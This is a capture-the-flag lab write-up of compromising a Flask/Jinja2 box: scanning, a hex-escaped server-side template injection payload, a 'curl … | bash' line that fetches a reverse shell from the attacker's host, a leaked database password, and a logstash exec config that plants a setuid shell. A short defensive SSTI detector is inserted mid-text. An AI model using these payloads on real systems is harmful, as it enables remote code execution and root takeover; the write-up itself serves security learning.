Port scanning

nmap --min-rate=10000 -p- 10.10.194.47
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-07 12:14 UTC
Nmap scan report for ip-10-10-194-47.eu-west-1.compute.internal (10.10.194.47)
Host is up (0.027s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE
7/tcp open echo
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
80/tcp open http
61337/tcp open unknown
MAC Address: 02:0A:D4:98:3C:7F (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 7.35 seconds
nmap -sT -sC -sV -O -p7,21,22,23,80,61337 10.10.194.47
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-07 12:15 UTC
Nmap scan report for ip-10-10-194-47.eu-west-1.compute.internal (10.10.194.47)
Host is up (0.017s latency).

PORT STATE SERVICE VERSION
7/tcp open echo
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 9e30c56192841b246486c33bb7dc9934 (RSA)
| 256 78c3c3838173cbf15041f19ad7bf3ed1 (ECDSA)
|_ 256 ecceb8f957535663e961901215e5784a (ED25519)
23/tcp open telnet Linux telnetd
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
61337/tcp open http Werkzeug httpd 2.0.1 (Python 3.6.9)
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was http://ip-10-10-194-47.eu-west-1.compute.internal:61337/login
|_http-server-header: Werkzeug/2.0.1 Python/3.6.9
MAC Address: 02:0A:D4:98:3C:7F (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 3.8 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.25 seconds

Web

FTP does not allow anonymous login, and telnet on port 23 also requires credentials. So let's look at port 80: scanning it turned up nothing but the default Apache page. There is also an HTTP service on port 61337, built with Python, and the room hints at "template", so template injection is quite likely. Visit it and scan for directories.

feroxbuster -u http://10.10.194.47:61337/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

There is an accessible /temporary/dev/newacc directory that can be used to register an account.

Enter {{7*7}} as the username. After registering and logging in, the Account page reads "Welcome 49", which shows that the username parameter is vulnerable to SSTI. It is most likely Jinja2, since Twig is written in PHP, but to be safe, register another user named

{{7*'6'}} to verify. That one seems to get detected; perhaps single quotes are not allowed.

Went straight to the ever-useful PayloadsAllTheThings and found a bypass: just replace the single quotes with double quotes. First start tcpdump

{{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("ping -c 1 10.13.22.166")|attr("read")()}}

as the username, register an account and click into Account; the ping is received successfully.
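As an added defensive example (not code from the write-up or the room), a Python check for registration input that resolves the \xNN escapes used in the payload above before matching, so a \x5f\x5f bypass is still seen as __; it is run against constructed sample usernames and contrasted with a naive raw-string filter of the kind the write-up bypassed. A denylist like this is only a detection aid: the real fix is to pass the username into the template as a context variable rather than concatenating it into the template source.

```python
import re

# Constructed sample registration usernames (not taken from the target in the write-up).
SAMPLE_USERNAMES = [
    "bill",
    "{{7*7}}",
    "{{7*'6'}}",
    '{{request|attr("application")|attr("\\x5f\\x5fglobals\\x5f\\x5f")}}',
]

HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
TEMPLATE_MARKERS = ("{{", "}}", "{%", "%}")
JINJA_ATTR_FILTER = re.compile(r"\|\s*attr\s*\(")


def normalize(value):
    """Resolve \\xNN string escapes so '\\x5f\\x5f' compares equal to '__'."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), value)


def naive_reasons(value):
    """Match on the raw string only; this is the filter style the hex-escaped payload slips past."""
    reasons = []
    if "'" in value:
        reasons.append("single quote")
    if "__" in value:
        reasons.append("dunder")
    return reasons


def ssti_reasons(value):
    """Flag Jinja template syntax after normalization; returns the list of reasons found."""
    norm = normalize(value)
    reasons = []
    if any(marker in norm for marker in TEMPLATE_MARKERS):
        reasons.append("template delimiter")
    if "__" in norm:
        reasons.append("dunder attribute")
    if JINJA_ATTR_FILTER.search(norm):
        reasons.append("attr() filter")
    return reasons


if __name__ == "__main__":
    for name in SAMPLE_USERNAMES:
        print(repr(name), "naive:", naive_reasons(name), "normalized:", ssti_reasons(name))
```

Logging the reasons rather than silently rejecting the request gives the SOC a signal for the probing attempts ({{7*7}}) that precede the real payload.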

Getting a shell

Now a reverse shell can be written.

Miscalculated: it seems & is filtered too.

So write a script instead, host it, and have the target fetch and execute it.

{{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("curl http://10.11.38.245/rev | bash")|attr("read")()}}

The reverse shell comes straight back; it runs as the bill user.

Privilege escalation

There are three other users: frankie, jenny and princess.

Found the database connection credentials in web.py:

temple_user/4$pCM!&bEEs$SR8H

But the other users' home directories don't seem to contain anything of interest.

Logged into the database and found a password hash for an admin user, but it couldn't be cracked.

The room hints at the running processes.

ps aux |grep "root"

root appears to be running a Java program called logstash, apparently something the server uses to collect log data.

Check the ever-useful HackTricks to read up on it:

https://book.hacktricks.xyz/linux-hardening/privilege-escalation/logstash

We can modify /etc/logstash/conf.d/logstash-sample.conf to execute commands:

echo 'input {
exec {
command => "cp /bin/bash /home/bill/shell; chmod +xs /home/bill/shell"
interval => 10
}
}

output {
file {
path => "/tmp/output.log"
codec => rubydebug
}
}'>logstash-sample.conf

Closing thoughts

A fairly simple box overall, with just two knowledge points. The SSTI was not really difficult: for basically any filter you can find a ready-made payload. Logstash was a first encounter for me, and HackTricks really is a great resource.